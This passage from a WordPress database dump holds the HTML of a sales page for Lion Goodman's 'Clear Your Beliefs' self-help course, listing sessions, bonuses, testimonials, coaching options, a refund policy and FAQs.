wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 20:59:09', '2014-06-18 01:59:09', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(919, 4194, '2014-06-17 13:40:40', '2014-06-17 18:40:40', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /><span style="color: #ff0000;"><strong>Your "limitations" were createdby your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" 